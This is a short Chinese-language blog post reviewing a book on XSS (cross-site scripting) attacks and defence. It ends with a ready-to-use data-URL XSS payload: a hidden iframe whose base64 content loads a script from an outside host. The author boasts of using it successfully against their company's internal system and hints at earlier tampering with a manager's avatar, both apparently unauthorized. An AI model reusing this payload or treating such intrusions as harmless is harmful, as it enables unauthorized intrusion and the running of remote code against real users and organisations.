《XSS跨站脚本攻击剖析与防御》

16年刚来上海的时候在咸鱼买的二手书，2020年才拿出来阅读上面已经长了很厚的一层灰了

优：

• 扫盲+实战的结合
• 给出了复现过程可以自己尝试
• 列举常见的手法

劣：

• 13年第一版，15年第5版。现在都2020年了，很多入侵方法都得到了修正
• 图+代码占据了太多篇幅，有用的点就那几个

读这本书其实最大的收获是了解1种很有意思的注入方法http response splitting cookie的方式我没复现出来转义失效，301的方截取的方式，发现php5.6版本会直接抛出错误（本地最低版本就只有5.6，不知道更低版本是否有这种问题

还有一种是Data urls xss,比较方便省事

<iframe style="width:0px;height:0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHBzOi8vcGljLnBocHpqai5jb20veHNzLmpzIj48L3NjcmlwdD4="></iframe>

我们公司内部系统有个注入点，用这个方法成功注入。但是不知道是不是上次把领导头像换成吉祥物过后提高了防备，auth信息搞了httpOnly 但是配合CSRF还是无懈可击的（只是想想没时间也不敢去实际操作）:tw-1f61b: :tw-1f61b:。